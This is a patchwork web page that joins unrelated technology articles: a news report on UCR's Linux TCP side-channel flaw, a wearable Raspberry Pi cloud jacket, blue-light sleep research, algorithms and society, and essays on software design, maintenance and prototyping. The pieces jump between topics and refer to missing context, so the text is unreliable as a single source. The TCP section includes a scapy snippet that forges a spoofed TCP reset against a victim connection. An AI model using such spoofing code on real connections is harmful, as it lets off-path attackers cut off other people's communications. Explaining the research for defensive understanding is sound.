
Know the Secret of a Security Threat to Many Internet Users

Such a weakness could be used to launch targeted attacks that track users’ online activity, forcibly terminate a communication, hijack a conversation between hosts, or degrade the privacy guarantee of anonymity networks such as Tor.

Led by Yue Cao, a computer science graduate student in UCR’s Bourns College of Engineering, the research will be presented on Wednesday (Aug. 10) at the USENIX Security Symposium in Austin, Texas. The project advisor is Zhiyun Qian, an assistant professor of computer science at UCR, whose research focuses on identifying security vulnerabilities to help software companies improve their systems.

While most users don’t interact directly with the Linux operating system, the software runs behind the scenes on internet servers, Android phones and a range of other devices. To transfer information from one source to another, Linux and other operating systems use the Transmission Control Protocol (TCP) to package and send data, and the Internet Protocol (IP) to ensure the information gets to the correct destination.

For example, when two people communicate by email, TCP assembles their message into a series of data packets — identified by unique sequence numbers — that are transmitted, received, and reassembled into the original message. Those TCP sequence numbers are useful to attackers, but with almost 4 billion possible sequences, it’s essentially impossible to identify the sequence number associated with any particular communication by chance.

The UCR researchers didn’t rely on chance though. Instead, they identified a subtle flaw (in the form of ‘side channels’) in the Linux software that enables attackers to infer the TCP sequence numbers associated with a particular connection with no more information than the IP address of the communicating parties.

This means that given any two arbitrary machines on the internet, a remote blind attacker, without being able to eavesdrop on the communication, can track users’ online activity, terminate connections with others and inject false material into their communications. Encrypted connections (e.g., HTTPS) are immune to data injection, but they are still subject to being forcefully terminated by the attacker. The weakness would allow attackers to degrade the privacy of anonymity networks, such as Tor, by forcing the connections to route through certain relays. The attack is fast and reliable, often taking less than a minute and showing a success rate of about 90 percent.
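To make the role of those sequence numbers concrete, here is a minimal sketch, in Python with the scapy packet library, of what an off-path attacker could do once a sequence number has been inferred. It is illustration only, not the UCR team’s exploit: the addresses and ports are hypothetical, the side-channel inference step itself is omitted, and it only works from a network that permits IP spoofing.

```python
# Illustration only: forging a TCP reset once an off-path attacker has
# inferred the victim connection's ports and an in-window sequence number.
# All addresses, ports, and numbers below are hypothetical.
from scapy.all import IP, TCP, send

CLIENT, SERVER = "203.0.113.10", "198.51.100.20"  # victim pair (example IPs)
CLIENT_PORT, SERVER_PORT = 51500, 80              # found via the side channel
inferred_seq = 0x1A2B3C4D                         # inferred, not guessed by chance

# A spoofed RST is accepted only if its sequence number falls in the
# receive window -- which is why inferring it (out of ~4 billion
# possibilities) lets a blind attacker terminate the connection.
rst = IP(src=SERVER, dst=CLIENT) / TCP(
    sport=SERVER_PORT, dport=CLIENT_PORT, flags="R", seq=inferred_seq
)
send(rst, verbose=False)  # the victim's TCP stack tears the connection down
```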

Qian said unlike conventional cyber attacks, users could become victims without doing anything wrong, such as downloading malware or clicking on a link in a phishing email.

“The unique aspect of the attack we demonstrated is the very low requirement to be able to carry it out. Essentially, it can be done easily by anyone in the world where an attack machine is in a network that allows IP spoofing. The only piece of information that is needed is the pair of IP addresses (for victim client and server), which is fairly easy to obtain,” Qian said.

A Powerful Form of Mobile Computing

Researchers have developed a fully functioning, yet compact and lightweight, cloud computing system.

Using 10 low-cost, credit-card-sized computers called Raspberry Pis, an old winter jacket, three power banks and a small remote touch screen display, Hasan and Khan developed a wearable system that brings all mobile computing solutions together, creating the ultimate smart device. The cloud jacket could make the design of mobile and wearable devices simple, inexpensive and lightweight by allowing users to tap into the resources of the wearable cloud, instead of relying solely on the capabilities of their mobile hardware.

“Currently if you want to have a smart watch, smartphone, an exercise tracker and smart glasses, you have to buy individual expensive devices that aren’t working together,” Hasan said. “Why not have a computational platform with you that can support many forms of mobile and wearable devices? Then all of these capabilities can become really inexpensive.”

The need for more powerful processors and consumer expectations for high-performance applications have caused the design of wearable and mobile devices to be complex and expensive. Someone who wishes to own a smart watch, smart glasses, a smartphone and a wearable health device would have to spend between $2,000 and $3,000 to purchase such devices. The cloud jacket prototype has roughly 10 gigabytes of RAM, while the average smartphone has only one to three gigabytes. In regard to storage, each Raspberry Pi within the jacket has 32 gigabytes of memory available.

Most wearable and mobile devices are made with processors that are nearly 10 times slower than desktop or laptop processors, limiting the types of applications that can run on them. With mobile apps becoming more complex, newer, more powerful versions of mobile and wearable devices are continuously released in order to keep up with changes in technology, resulting in increased prices.

To make up for resource limitations, many mobile applications are also powered by cloud servers, which require constant communication over the internet. Mobile and wearable device users are required to upload all personal data to remote public clouds or local cloud data centers, without the knowledge of where their personal data is actually being stored.

“Our overall approach is to create a generic atmosphere or platform that users can customize to fit their needs,” Khan said. “The wearable cloud can act as an application platform, so instead of modifying or having to upgrade hardware, this wearable model provides a platform, and developers can build anything on top of it.”

With a wearable cloud, mobile and wearable devices would no longer need complex, powerful processors. By turning them into “dumb terminal devices,” or controllers, the wearable cloud would provide the experience of a smart device. The user connects the terminal devices via Bluetooth or Wi-Fi and requests services through an intuitive display; the computational task is then sent to the wearable private cloud.

Nodes inside the jacket are engaged and compute the task collectively. Upon completion, the displayable result is sent back to the terminal device. The tasks are performed from the privately owned wearable cloud jacket, which also retains most, if not all, personal data.
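As a rough sketch of that dumb-terminal model, the snippet below shows how a terminal device might ship a task to the jacket over a plain TCP socket and wait for the displayable result. The protocol, address, port, and task name are all invented for illustration; the article does not describe the actual interface Hasan and Khan built.

```python
# Hypothetical "dumb terminal" client: send a task to the wearable cloud,
# receive only the displayable result. Protocol, address, and task name
# are invented for this sketch.
import json
import socket

JACKET_ADDR = ("192.168.4.1", 9000)  # assumed address of the jacket's head node

def offload(task: str, payload: dict) -> dict:
    """Ship a task to the wearable cloud and block until the result returns."""
    with socket.create_connection(JACKET_ADDR) as sock:
        sock.sendall(json.dumps({"task": task, "payload": payload}).encode())
        sock.shutdown(socket.SHUT_WR)      # tell the jacket the request is complete
        data = sock.makefile("rb").read()  # nodes inside the jacket compute the task
    return json.loads(data)

# The terminal device stays "dumb": it only renders whatever comes back.
print(offload("heart_rate_summary", {"window_minutes": 10}))
```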

“Once you have turned everything else into a ‘dumb device,’ the wearable cloud becomes the smart one,” Hasan said. “The application paradigm becomes much more simple and brings everything together. Instead of individual solutions, now you have everything as a composite solution.”

Hasan and Khan’s wearable cloud concept differs from existing “smart clothing” solutions, which act only as input devices. Current products such as the Levi’s “Smart Jacket” allow a user to make hand gestures on the jacket to answer a phone call or shuffle through a playlist.

The wearable personal cloud concept is not limited to clothing. The system model allows the personal cloud to extend to any item carried on a daily basis, from a jacket to a briefcase, purse or backpack. Hasan and Khan believe this type of technology solution could aid in a variety of ways, from the way first responders communicate and share information during disasters to the way soldiers communicate on the battlefield.

“With seven to 10 people wearing such a cloud together, they create what we call a hyper-cloud, a much more powerful engine,” Hasan said. “The jacket can also act as a micro or picocell tower. All of its capabilities can be shared on a private network with other devices via Wi-Fi or Bluetooth. If a first responder is out in the field and doesn’t have complete information to act on a mission, but someone else does, it can be shared and updated through the cloud in real time.”

Suppose a disaster occurs and first responders are entering a damaged building. They may have blueprints of what the building looked like prior to the incident, but only those inside know what areas are now damaged or where an injured person is located. By pairing the wearable cloud with a device like Google Glass or night vision goggles, anyone with access to the cloud can see whatever the person wearing the cloud is seeing in real time, without the need for platform- or device-specific hardware and software.

Hasan and Khan call this a delegated experience.

“Another potential application area that we are looking into is hospital gowns,” Hasan said. “When a patient comes in, they are connected to monitors to obtain heart rate, blood pressure and other vitals. Whenever a patient has to go to the restroom or needs to be moved around, they have to take everything off or maneuver around with a large pole carrying all of the connected devices. Instead, we are putting sensors inside a vest that can be placed over the hospital gown itself. There will be a small version of the wearable cloud within the vest so that the vest itself can collect information, like a patient’s temperature.”

Know the Effect of Blue Light Screens

The use of smartphones and tablet computers during evening hours has previously been associated with sleep disturbances in humans.

The use of blue light emitting devices during evening hours has been shown to interfere with sleep in humans. In a new study from Uppsala University involving 14 young females and males, neuroscientists Christian Benedict and Frida Rångtell sought to investigate the effects of evening reading on a tablet computer on sleep following daytime bright light exposure.

‘Our main finding was that following daytime bright light exposure, evening use of a self-luminous tablet for two hours did not affect sleep in young healthy students’, says Frida Rångtell, first author and PhD student at the Department of Neuroscience at Uppsala University.

‘Our results could suggest that light exposure during the day, e.g. by means of outdoor activities or light interventions in offices, may help combat sleep disturbances associated with evening blue light stimulation. Even if not examined in our study, it must however be kept in mind that utilizing electronic devices for the sake of checking your work e-mails or social network accounts before snoozing may lead to sleep disturbances as a result of emotional arousal’, says senior author Christian Benedict, associate professor at the Department of Neuroscience.

Learn More About Computer Algorithms

The use of algorithms to filter and present information online is increasingly shaping our everyday experience of the real world.

Associate Professor Michele Willson of Curtin University, Perth, Australia looked at particular examples of computer algorithms and the questions they raise about personal agency, changing world views and our complex relationship with technologies.

Algorithms are central to how information and communication are located, retrieved and presented online, for example in Twitter follow recommendations, Facebook newsfeeds and suggested Google map directions. However, they are not objective instructions but assume certain parameters and values, and are in constant flux, with changes made by both humans and machines.

Embedded in complex amalgams of political, technical, cultural and social interactions, algorithms bring about particular ways of seeing the world, reproduce stereotypes, strengthen world views, restrict choices or open previously unidentified possibilities.

As well as shaping what we see online, algorithms are increasingly telling us what we should be seeing, the study argues. For example, an algorithm that claims to spot beauty and tell you which selfies to delete implies we should trust technology more than ourselves to make aesthetic choices. Such algorithms also carry assumptions that beauty can be defined as universal and timeless, and can be easily reduced to a particular combination of data.

The idea that everything is reducible to data is also beginning to affect the way people perceive their environment and everyday relations. This can be seen in the growing popularity of wearable devices that track aspects of our physical activity and health then analyse and relay them back to us. Such algorithm-driven technologies transform biological items and actions into data — a process that is unquestioned, normalised and invisible.

Professor Willson said: “By delegating everyday practices to technological processes, with the resultant need to break down and reduce complex actions into a series of steps and data decision points, algorithms epitomise and encapsulate a growing tendency towards atomisation and fragmentation that resonates more broadly with an increasing emphasis on singularity, quantification and classification in the everyday.”

Reviews of Software Design and Programmers

How important are software design skills to a programmer? In the traditional, and perhaps most widespread, view of the software development process, the answer is: not very.

The job of the programmer, after all, is to write code. Coding is viewed as a “construction” activity, and everyone knows you have to complete the design before beginning construction. The real design work is performed by specialized software designers. Designers create the designs and hand them off to programmers, who turn them into code according to the designer’s specifications. In this view, then, the programmer only needs enough design skills to understand the designs given to her. The programmer’s main job is to master the tools of her trade.

This view, of course, only tells one story, since there is great variety among software development projects. Let’s consider a spectrum of software development “realities.” At one end of the spectrum we have the situation described above. This hand-off based scenario occurs especially on larger, more complex projects, and especially within organizations that have a longstanding traditional software engineering culture. Specialization of function is a key component on these kinds of projects. Analysts specialize in gathering and analyzing requirements, which are handed off to designers who specialize in producing design specifications, which are handed off to programmers who specialize in producing code.

At the opposite end of the spectrum, best represented by the example of Extreme Programming (XP), there are no designers, just programmers; the programmers are responsible for the design of the system. In this situation, there is no room for specialization. According to Pete McBreen, in his excellent analysis of the Extreme Programming methodology and phenomenon, Questioning Extreme Programming, “The choice that XP makes is to keep as many as possible of the design-related activities concentrated in one role—the programmer.” [McBreen, 2003, p. 97] This reality is also well represented in a less formal sense by the millions of one- or two-person software development shops in which the same people do just about everything—requirements, design, construction, testing, deployment, documentation, training, and support.

Many other realities fall somewhere in between the two poles a) of pure, traditional, segmented software engineering, where highly detailed “complete designs” are handed off to programmers, and b) Extreme Programming and micro-size development teams, where programmers are the stars of the show. In the “middle realities” between these poles there are designers, lead programmers, or “architects” who create a design (in isolation or in collaboration with some or all of the programmers), but the design itself is (intentionally or unintentionally) not a complete design. Furthermore, the documentation of the design will have wide disparities in formality and format from one reality to another. In these situations, either explicitly or implicitly, the programmers have responsibility over some portion of the design, but not all of it. The programmer’s job is to fill in the blanks in the design as she writes the code.

There is one thing that all of the points along this spectrum have in common: even in the “programmers just write the code” software engineering view, all programmers are also software designers. That bears repeating: all programmers are also software designers. Unfortunately, this fact is not often enough recognized or acknowledged, which leads to misconceptions about the nature of software development, the role of the programmer, and the skills that programmers need to have. (Programmers, when was the last time you were tested on, or even asked about, your design skills in a job interview?)

In an article for IEEE Software magazine called “Software Engineering Is Not Enough,” James A. Whittaker and Steve Atkin do an excellent job of skewering the idea that code construction is a rote activity. The picture they paint is a vivid one, so I will quote more than a little from the article:

Imagine that you know nothing about software development. So, to learn about it, you pick up a book with “Software Engineering,” or something similar, in the title. Certainly, you might expect that software engineering texts would be about engineering software. Can you imagine drawing the conclusion that writing code is simple—that code is just a translation of a design into a language that the computer can understand? Well, this conclusion might not seem so far-fetched when it has support from an authority:

The only design decisions made at the coding level address the small implementation details that enable the procedural design to be coded. [Pressman, 1997, p. 346]

Really? How many times does the design of a nontrivial system translate into a programming language without some trouble? The reason we call them designs in the first place is that they are not programs. The nature of designs is that they abstract many details that must eventually be coded. [Whittaker, 2002, p.108]

The scary part is that the software engineering texts that Whittaker and Atkin so skillfully deride are the standard texts used in college software development courses. Whittaker and Atkin continue with this criticism two pages later:

Finally, you decide that you simply read the wrong section of the software engineering book, so you try to find the sections that cover coding. A glance at the table of contents, however, shows few other places to look. For example, Software Engineering: A Practitioner’s Approach, McGraw-Hill’s best-selling software engineering text, does not have a single program listing. Neither does it have a design that is translated into a program. Instead, the book is replete with project management, cost estimation, and design concepts. Software Engineering: Theory and Practice, Prentice Hall’s bestseller, does dedicate 22 pages to coding. However, this is only slightly more than four percent of the book’s 543 pages. [Whittaker, 2002, p. 110]

(I recommend seeking out this article as the passages I have quoted are only a launching point for a terrific discussion of specific issues to consider before, during, and after code construction.)

Given a world where “coding is trivial” seems to be the prevailing viewpoint, it is no wonder that many working software professionals sought a new way of thinking about the relationship between and nature of design and construction. One approach that has arisen as an alternative to the software engineering approach is the craft-based approach, which de-emphasizes complex processes, specialization, and hand-offs. Extreme Programming is an example of a craft-centric methodology. There are many others as well.

Extreme Programming, and related techniques such as refactoring and “test first design,” arose from the work Smalltalk developers Kent Beck and Ward Cunningham did together. The ideas Beck and Cunningham were working with were part of a burgeoning object-oriented movement, in which the Smalltalk language and community played a critical role. According to Pete McBreen in Questioning Extreme Programming, “The idea that the source code is the design was widespread in the Smalltalk community of the 1980s.” [McBreen, 2003, p. 100]

Extreme Programming has at its core the idea that the code is the design and that the best way to simultaneously achieve the best design and the highest quality code is to keep the design and coding activities tightly coupled, so much so that they are performed by the same people—programmers. Refactoring, a key XP concept, codifies a set of methods for incrementally altering, in a controlled manner, the design embodied in code, further leveraging the programmer’s role as designer. Two other key XP concepts, “test first design” and automated unit testing, are based on the idea that, not only is the code the design, but the design is not complete unless it can be verified through testing. It is, of course, the programmer’s job to verify the design through unit testing.

It is not much of a stretch to conclude that one of the reasons Extreme Programming (and the Agile Methodology movement in general) have become so popular, especially with people who love to write code, is that they recognize (explicitly or implicitly) that programmers have a critical role to play in software design—even when they are not given the responsibility to create or alter the “design.” Academics and practitioners who champion the traditional software engineering point of view often lament that the results of their research and publications do not trickle down fast enough to practicing software developers.

The Solution of Software Maintenance

The standard rationale for that standard answer is: look how much of the budget we’re putting into software maintenance.

If you had just built the software better in the first place, the argument goes, you wouldn’t have to waste all that money on maintenance.

Well, I want to take the position that this standard answer is wrong. It’s wrong, I want to say, because the standard rationale is wrong.

The fact of the matter is, software maintenance isn’t a problem, it’s a solution!

What we are missing in the traditional view of software as a problem is the special significance of two pieces of information:

  1. The software product is “soft” (easily changed) compared to other, “harder,” disciplines.
  2. Software maintenance is far less devoted to fixing errors (17 percent) than to making improvements (60 percent).

In other words, software maintenance is a solution instead of a problem because in software maintenance we can do something that no one else can do as well, and because when we do it we are usually building new solutions, not just painting over old problems. If software maintenance is seen as a solution and not as a problem, does that give us some new insight into how to do maintenance better?

I take the position that it indeed does.

The traditional, problem-oriented view of maintenance says that our chief goal in maintenance should be to reduce costs. Well, once again, I think that’s the wrong emphasis. If maintenance is a solution instead of a problem, we can quickly see that what we really want to do is more of it, not less of it. And the emphasis, when we do it, should be on maximizing effectiveness, and not on minimizing cost.

New vistas are open to us from this new line of thinking. Once we take our mindset off reducing costs and place it on maximizing effectiveness, what can we do with this new insight?

The best way to maximize effectiveness is to utilize the best possible people. There is a lot of data that supports that conclusion. Much of it is in the “individual differences” literature, where we can see, for example, that some people are significantly better than others at doing software things:

  • Debugging: some people are 28 times better than others.
  • Error detection: some people are 7 times better than others.
  • Productivity: some people are 5 times better than others.
  • Efficiency: some people are 11 times better than others.

The bottom line of these snapshot views of the individual differences literature is that there is enormous variance between people, and the best way to get the best job done is to get the best people to do it.

This leads us to two follow-on questions:

  1. Does the maintenance problem warrant the use of the best people?
  2. Do we currently use the best people for doing maintenance?

The first question is probably harder to answer than the second. My answer to that first question is “Yes, maintenance is one of the toughest tasks in the software business.” Let me explain why I feel that way.

Several years ago I coauthored a book on software maintenance. In the reviewing process, an anonymous reviewer made this comment about maintenance, which I have remembered to this day:

Maintenance is:

  • intellectually complex (it requires innovation while placing severe constraints on the innovator)
  • technically difficult (the maintainer must be able to work with a concept and a design and its code all at the same time)
  • unfair (the maintainer never gets all the things the maintainer needs. Take good maintenance documentation, for example)
  • no-win (the maintainer only sees people who have problems)
  • dirty work (the maintainer must work at the grubby level of detailed coding)
  • living in the past (the code was probably written by someone else before they got good at it)
  • conservative (the going motto for maintenance is “if it ain’t broke, don’t fix it”)

My bottom line, and the bottom line of this reviewer, is that software maintenance is pretty complex, challenging stuff.

Now, back to the question of who currently does maintenance. In most computing installations, the people who do maintenance tend to be those who are new on the job or not very good at development. There’s a reason for that. Most people would rather do original development than maintenance because maintenance is too constraining to the creative juices for most people to enjoy doing it. And so by default, the least capable and the least in demand are the ones who most often do maintenance.

If you have been following my line of reasoning here, it should be obvious by now that the status quo is all wrong. Maintenance is a significant intellectual challenge as well as a solution and not a problem. If we want to maximize our effectiveness at doing it, then we need to significantly change the way in which we assign people to it.

I have specific suggestions for what needs to be done. They are not pie-in-the-sky theoretical solutions. They are very achievable, if management decides that it wants to do them:

  1. Make maintenance a magnet. Find ways to attract people to the maintenance task. Some companies do this by paying a premium to maintainers. Some do this by making maintenance a required stepping stone to upper management. Some do this by pointing out that the best way to a well-rounded grasp of the institution’s software world is to understand the existing software inventory.
  2. Link maintenance to quality assurance. (We saw this in the previous essay.)
  3. Plan for improved maintenance technology. There are now many tools and techniques for doing software maintenance better. (This has changed dramatically in the last couple of years.) Training and tools selection and procurement should be high on the concerned maintenance manager’s list of tasks.
  4. Emphasize “responsible programming.” The maintainer typically works alone. The best way to maximize the effectiveness of this kind of worker is to make them feel responsible for the quality of what they do. Note that this is the opposite of the now-popular belief in “egoless programming,” where we try to divest the programmer’s personal involvement in the final software product in favor of a team involvement. It is vital that the individual maintainer be invested in the quality of the software product if that product is to continue to be of high quality.

There they are…four simple steps to better software maintenance. But note that each of those steps involves changing a traditional software mindset. The transition is technically easy, but it may not be socially or politically quite so easy. Most people are heavily invested in their traditional way of looking at things.

The Human Impact of Software

My first job in the computer software business was as an entry-level help desk technician. I had been a computer user for many years, ever since my family brought home its first Tandy Color Computer.

I joined this tiny software firm on the cusp of the 1.0 release of their first application. If I remember correctly, when I came on board they were in the process of running the floppy disk duplicator day and night, printing out address labels, and packaging up the user documentation. As I pitched in to help get this release out the door, little did I know that I was about to learn a lesson about software development that I will never forget.

The shipments all went out (about a thousand of them I think, all advance orders), and we braced ourselves for the phone to start ringing. In the meantime, I was poring over Peter Norton’s MS-DOS 5.0 book, which was to become my best friend in the coming months. We knew the software had hit the streets when the phone started ringing off the hook. It was insane. The phone would not stop ringing. Long story short, the release was a disaster.

Many people could not even get it installed, and those people who could were probably less happy than the ones who could not. The software was riddled with bugs. Financial calculations were wrong; line items from one order would mysteriously end up on another order; orders would disappear altogether; the reports would not print; indexes were corrupted; the menus were out of whack; cryptic error messages were popping up everywhere; complete crashes were commonplace; tons of people did not have enough memory to even run the application. It was brutal. Welcome, Dan, to the exciting world of software.

Eventually, we just turned off the phones and let everyone go to voice mail. The mailbox would fill up completely about once an hour, and we would just keep emptying it. We could not answer the phones fast enough, and when we did, people were just screaming and ranting. One guy was so mad that several nights in a row he faxed us page after page after page of solid blackness, killing all the paper and ink in our fax machine.

It took us months to dig ourselves out of this hole. We put out several maintenance releases, all free of charge to our customers. We worked through the night many times, and I slept on the floor of the office more than once. Really the only thing that saved us was our own tenacity and the fact that our customers did not have any other place to go. Our software was somewhat unique.

It was obvious to everyone in our company what caused this disaster: bad code. The company had hired a contract developer to write the software from scratch, and, with some help from a couple of his colleagues, this guy wrote some of the worst code I have ever seen. (Thom, if by some slim chance you’re reading this, I’m sorry man, but it was bad). It was total spaghetti. As I learned over the years about cohesion, coupling, commenting, naming, layout, clarity, and the rest, it was always immediately apparent to me why these practices would be beneficial. Wading through that code had prepared me to receive this knowledge openly.

I stayed with the company for three years, and we eventually turned the product into something I am still proud of. It was never easy, though. I swear I packed ten years of experience into those three years. My time working with that software, that company, and the people there who mentored me have shaped all of my software development philosophies, standards, and practices ever since.

When I got some distance from the situation, I was able to articulate to myself and others the biggest lesson I learned there: software can have a huge impact on the lives of real people. Software is not just an abstraction that exists in isolation. When I write code, it’s not just about me, the code, the operating system, and the database. The impact of what I do when I develop software reaches far beyond those things and into people’s lives. Based on my decisions, standards, and commitment to quality (or lack of it), I can have a positive impact or a negative one. Here is a list of all of the people who were affected negatively by that one man’s bad code:

  • Hundreds of customers, whose businesses were depending on our software to work, and who went through hell because of it.
  • The families of those customers, who were deprived of fathers and mothers that had to stay up all night re-entering corrupted data and simply trying to get our software to work at all. (I know, because I was on the phone with them at three in the morning.)
  • The employees of these customers who had to go through the same horrible mess.
  • The owner of our company (who was not involved in the day-to-day operations), whose reputation and standing was seriously damaged by this disaster, and whose bank account was steadily depleted in the aftermath.
  • The prominent business leaders in the vertical market who had blindly endorsed and recommended our software—their reputations were likewise damaged.
  • All of the employees of our company, for obvious reasons.
  • All of our families, significant others, etc.—again for obvious reasons.
  • All of the future employees of the company, who always had to explain and deal with the legacy of that bad code and that disastrous first release.
  • The programmer himself, who had to suffer our wrath, and who had to stay up all night for many, many nights trying to fix up his code.
  • The family of that programmer (he had several children) who hardly saw him for several weeks.
  • The other developers (including myself) who had to maintain and build on that code in the years to follow.

Learn More About Computer Programming

What exactly is software development, and why is it so hard? This is a question that continues to engage our thoughts. Is software development an engineering discipline? Is it art? Is it more like a craft?

We think that it is all of these things, and none of them. Software is a uniquely human endeavor, because despite all of the technological trimmings, we’re manipulating little more than the thoughts in our heads. That’s pretty ephemeral stuff. Fred Brooks put it rather eloquently some 30-odd years ago [Bro95]:

“The programmer, like the poet, works only slightly removed from pure thought-stuff. He builds his castles in the air, from air, creating by exertion of the imagination. Few media of creation are so flexible, so easy to polish and rework, so readily capable of realizing grand conceptual structures. (As we shall see later, this very tractability has its own problems.)”

In a way, we programmers are quite lucky. We get the opportunity to create entire worlds out of nothing but thin air. Our very own worlds, complete with our own laws of physics. We may get those laws wrong of course, but it’s still fun.

This wonderful ability comes at a price, however. We continually face the most frightening sight known to a creative person: the blank page.

1. Writer’s Block

Writers face the blank page, painters face the empty canvas, and programmers face the empty editor buffer. Perhaps it’s not literally empty—an IDE may want us to specify a few things first. Here we haven’t even started the project yet, and already we’re forced to answer many questions: what will this thing be named, what directory will it be in, what type of module is it, how should it be compiled, and so on.

The completely empty editor buffer is even worse. Here we have an infinite number of choices of text with which to fill it.

So it seems we share some of the same problems with artists and writers:

  1. How to start
  2. When to stop
  3. Satisfying the person who commissioned the work

Writers have a name for difficulties in starting a piece: they call it Writer’s Block.

Sometimes writer’s block is borne of fear: Fear of going in the wrong direction, of getting too far down the wrong path. Sometimes it’s just a little voice in your head saying “don’t start yet”. Perhaps your subconscious is trying to tell you that you’re missing something important that you need before you can start.

How do other creative artists break this sort of logjam? Painters sketch; writers write a stream of consciousness. (Writers may also do lots of drugs and get drunk, but we’re not necessarily advocating that particular approach.)

What then, is the programming equivalent of sketching?

Software Sketches

Sometimes you need to practice ideas, just to see if something works. You’ll sketch it out roughly. If you’re not happy with it, you’ll do it again. And again. After all, it takes almost no time to do, and you can crumple it up and throw it away at the end.

For instance, there’s a pencil sketch by Leonardo da Vinci that he used as a study for the Trivulzio equestrian monument. The single fragment of paper contains several quick sketches of different views of the monument: a profile of the horse and rider by themselves, several views of the base with the figures, and so on. Even though the finished piece was to be cast in bronze, da Vinci’s sketches were simply done in pencil, on a nearly-scrap piece of paper. These scribblings were so unimportant that they didn’t even deserve a separate piece of paper! But they served their purpose nonetheless.[1]

Pencil sketches make fine prototypes for a sculpture or an oil painting. Post-It notes are fine prototypes for GUI layouts. Scripting languages can be used to try out algorithms before they’re recoded in something more demanding and lower level. This is what we’ve traditionally called prototyping: a quick, disposable exercise that concentrates on a particular aspect of the project.

In software development, we can prototype to get the details in a number of different areas:

  1. a new algorithm, or combination of algorithms
  2. a portion of an object model
  3. interactions and data flow between components
  4. any high-risk detail that needs exploration
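For instance, a disposable Python sketch (an invented example, in the spirit of a pencil study) might be all you need to see whether an algorithm idea holds up before committing to a real implementation:

```python
# A throwaway sketch: is a simple moving average smooth enough for our data?
# Quick to write, quick to discard -- prototype, not product.
def moving_average(samples, window=3):
    return [
        sum(samples[i : i + window]) / window
        for i in range(len(samples) - window + 1)
    ]

print(moving_average([4, 8, 6, 5, 3, 7]))  # eyeball the output, then decide
```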

A slightly different approach to sketching can be seen in da Vinci’s Study for the Composition of the Last Supper. In this sketch, you can see the beginnings of the placement of figures for that famous painting. The attention is not placed on any detail—the figures are crude and unfinished. Instead, da Vinci paid attention to focus, balance and flow. How do you arrange the figures, position the hands and arms in order to get the balance and flow of the entire piece to work out?

Sometimes you need to prototype various components of the whole to make sure that they work well together. Again, concentrate on the important aspects and discard unimportant details. Make it easy for yourself. Concentrate on learning, not doing.

As we say in The Pragmatic Programmer, you must firmly have in your head what you are doing before you do it. It’s not at all important to get it right the first time. It’s vitally important to get it right the last time.

Paint Over It

Sometimes the artist will sketch out a more finished looking piece, such as Rembrandt’s sketch for Abraham’s Sacrifice Of Isaac in 1635. It’s a crude sketch that has all of the important elements of the final painting, all in roughly the right areas. It proved the composition, the balance of light and shadow, and so on. The sketch is accurate, but not precise. There are no fine details.

Media willing, you can start with such a sketch, where changes are quick and easy to make, and then paint right over top of it with the more permanent, less-forgiving media to form the final product.

To simulate that “paint over a sketch” technique in software, we use Tracer Bullet development. If you haven’t read The Pragmatic Programmer yet, here’s a quick explanation of why we call it a Tracer Bullet.

 

Picture a machine gunner in the dark of night, aiming the old-fashioned way: calculate the target’s position, factor in distance, wind, and ammunition, and work out a precise firing solution in advance. By the time you’ve set up, checked and rechecked the numbers, and issued the orders to the grunts manning the machine, the target has long since moved.

In software, this kind of approach can be seen in any method that emphasizes planning and documenting over producing working software. Requirements are generally finalized before design begins. Design and architecture, detailed in exquisite UML diagrams, are firmly established before any code is written (presumably that would make coders analogous to the “grunts” who actually fire the weapon, oblivious to the target).

Don’t misunderstand: if you’re firing a really huge missile at a known, stable target (like a city), this works out just great and is the preferable way to go. If you’re shooting at something more maneuverable than a city, though, you need something that provides a bit more real-time feedback.

Tracer bullets.

With tracer bullets, you simply fill the magazine with phosphorus-tipped bullets spaced every so often. Now you’ve got streaks of light showing you the path to the target right next to the live ammunition.

For our software equivalent, we need a skeletally thin system that does next to nothing, but does it from end to end, encompassing areas such as the database, any middleware, the application logic or business rules, and so on. Because it is so thin, we can easily shift position as we try to track the target. By watching the tracer fire, we don’t have to calculate the effect of the wind, or precisely know the location of the target or the weight of the ammunition. We watch the dynamics of the entire system in motion, and adjust our aim to hit the target under actual conditions.
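In code, such a tracer-bullet skeleton might look like the sketch below: every layer is present but trivial, and the names are invented for illustration. The point is only that one request travels the entire path, end to end.

```python
# A tracer-bullet skeleton: every architectural layer exists but does
# next to nothing. The goal is a working end-to-end path, not features.

def ui_layer(request: str) -> str:
    """Stand-in front end: accept a request, return a rendered response."""
    return render(business_rules(request))

def business_rules(request: str) -> dict:
    """Stand-in application logic: a single hard-coded rule for now."""
    return {"request": request, "answer": database_lookup(request)}

def database_lookup(key: str) -> str:
    """Stand-in persistence layer: a dict in place of the real database."""
    return {"ping": "pong"}.get(key, "unknown")

def render(result: dict) -> str:
    return f"{result['request']} -> {result['answer']}"

# Fire one tracer round through the whole system and watch where it lands.
print(ui_layer("ping"))  # ping -> pong
```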

As with the paintings, the important thing isn’t the details, but the relationships, the responsibilities, the balance, and the flow. With a proven base—however thin it may be—you can proceed in greater confidence towards the final product.

Group Writer’s Block

Up till now, we’ve talked about writer’s block as it applies to you as an individual. What do you do when the entire team has a collective case of writer’s block? Teams that are just starting out can quickly become paralyzed in the initial confusion over roles, design goals, and requirements.

One effective way to get the ball rolling is to start the project off with a group-wide, tactile design session. Gather all of the developers in a room[2] and provide sets of Lego blocks, plenty of Post-It notes, whiteboards and markers. Using these, proceed to talk about the system you’ll be building and how you think you might want to build it.

Keep the atmosphere loose and flexible; this gets the team comfortable with the idea of change. Because this is low-inertia design, anyone can contribute. It’s well within any participant’s skills to walk up to the whiteboard and move a Post-It note, or to grab a few Lego blocks and rearrange them. That’s not necessarily true of a CASE tool or drawing software: those tools do not lend themselves readily to rapid-feedback, group interaction.

Jim Highsmith offers us a most excellent piece of advice: The best way to get a project done faster is to start sooner. Blast through that writer’s block, and just start.

Just Start

Whether you’re using prototypes or tracer bullets, individually or with a group, you’re working—not panicking. You’re getting to know the subject, the medium, and the relationship between the two. You’re warmed up, and have started filling that blank canvas.

But we have one additional problem that the painters do not have. We face not one blank canvas per project, but hundreds. Thousands, maybe. One for every new module, every new class, every new source file. What can we do to tackle that multiplicity of blank canvases? The Extreme Programming [Bec00] notion of Test First Design can help.

The first test you are supposed to write—before you even write the code—is a painfully simple, nearly trivial one. It seems to do almost nothing. Maybe it only instantiates the new class, or simply calls the one routine you haven’t written yet. It sounds so simple, and so stupid, that you might be tempted not to do it.

